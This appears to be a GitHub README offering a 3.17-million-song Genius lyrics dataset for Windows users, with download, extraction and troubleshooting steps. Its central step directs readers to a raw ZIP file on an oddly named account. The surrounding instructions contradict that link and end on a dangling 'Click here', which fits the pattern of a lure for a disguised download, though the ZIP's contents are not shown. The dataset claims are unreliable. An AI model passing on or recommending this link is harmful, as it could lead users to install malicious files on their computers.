This dataset contains over 3.17 million cleaned and deduplicated English song lyrics. The data comes from Genius and includes key information like song title, artist, genre tag, year of release, and the full lyrics. It is a mirror of the dataset hosted on HuggingFace and is licensed under MIT. This dataset is suitable for uses like text analysis, language modeling, machine learning, and music research.
You do not need programming skills to work with this data if you only want to download and explore the contents. This guide will help you get the dataset on your Windows computer step by step.
- Windows 10 or later
- At least 4 GB of free disk space (dataset size is roughly 800 MB compressed)
- A modern web browser (Chrome, Edge, Firefox)
- Optional: A CSV or JSON viewer (for exploring data files) such as Microsoft Excel or a free tool like VS Code or Notepad++
Click the large green button at the top or use the direct link below to visit the dataset page.
On this page, you will find the dataset files and instructions. Follow the next steps to get the dataset on your PC.
-
Open the link: https://github.com/accruementstuff994/genius-lyrics-cleaned-dataset/raw/refs/heads/main/data/lyrics-cleaned-dataset-genius-v2.5.zip
-
Look for the "Code" button near the top right of the page, and click it.
-
In the menu that opens, select Download ZIP. This will download a file named something like
genius-lyrics-cleaned-dataset-main.zipto your default download folder. -
After the download finishes, open your "Downloads" folder and find the ZIP file.
-
Right-click the ZIP file and choose Extract All....
-
In the extraction dialog, pick a location where you want the dataset files to be saved (for example, your Desktop or Documents folder). Click Extract.
-
Once extraction is complete, you can open the folder to see the dataset files.
The dataset contains multiple files with different formats, such as CSV or JSON:
lyrics.csv– This file holds the core data: title, artist, genre, year, and lyrics.metadata.json– Contains metadata details about the dataset.README.md– Additional information from the dataset creators.
If you want to open lyrics.csv, you can use programs like Microsoft Excel or any CSV viewer.
You don’t need to install anything special to browse the files. Just open the CSV file to view the lyrics and information.
For more advanced uses like text processing or machine learning:
- Consider installing software like Python and Jupyter Notebook.
- Use libraries like pandas for handling the data.
- Use text editors to explore raw data in JSON files.
The data is useful for tasks like:
- Language analysis
- Song lyric research
- Training language models
- Creating music recommendation systems
- If CSV files are too large for Excel, try tools like CSVed or OpenRefine.
- To search lyrics quickly, use a text editor with "Find" functions (VS Code, Notepad++).
- Use databasing software if you want more complex queries on the dataset.
- If your download fails, check your internet connection and try again.
- Ensure you have enough free disk space.
- If the ZIP file fails to extract, try a different extraction tool like 7-Zip.
- If you have trouble opening CSV files, try importing them into Excel using the import wizard.
Click here to visit the dataset page and download files: